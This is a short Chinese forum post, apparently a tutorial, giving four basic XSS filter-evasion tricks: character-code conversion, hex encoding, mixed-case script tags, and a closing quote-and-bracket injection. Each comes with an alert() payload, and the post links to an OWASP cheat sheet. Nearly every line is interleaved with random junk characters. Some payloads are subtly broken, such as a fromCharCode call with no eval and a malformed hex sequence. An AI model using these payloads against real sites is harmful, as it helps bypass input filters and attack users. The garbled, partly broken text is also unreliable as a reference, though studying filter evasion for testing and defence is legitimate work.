四种超级基础的绕过方法。
/ b3 t* P2 [2 w# ^1.转换为ASCII码& M3 r# i9 A' C4 B
例子:原脚本为<script>alert(‘I love F4ck’)</script >
( t5 f9 _. N/ X0 D% k通过转换,变成:1 V/ D: c$ B: V3 Q
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>$ w+ j5 B5 a- O& c
4 n4 G+ A5 t& y2 f. k; {. d v2.转换为HEX(十六进制)9 E8 A2 F. T, N4 y
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( U+ N5 j; j, K+ n4 `5 |通过转换,变成:; ^8 q% ~8 @8 ?4 l" }! q7 ^6 p4 R
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e, U9 v0 b: s6 R" C. @7 E
6 p! M, U, ^6 w/ V. E3.转换脚本的大小写
3 v6 n, X- b* J4 p. p例子:原脚本为<script>alert(‘I love F4ck’)</script>
# A% d# y4 l6 j; g1 N* Y6 r转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
, m8 j* T+ H+ c- Y& U! Q8 ^ - M2 Y* n& [0 v
4.增加闭合标记”>
+ j% d* A) h+ _/ c/ }例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 ~9 W+ s7 E3 v# y转换为:”><script>alert(‘I love F4ck’)</script>
) s) {, G5 q o9 o0 ~# n) a更详细绕过技术请参考此网页
9 {! J6 q1 M1 S) Q# Ihttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
1 k, r: G* ~7 E, m9 R1 I* ?7 o ; G% j) ?4 e9 I5 ?+ Y% ~
转换工具使用的是火狐的 hackbar mozilla addon. |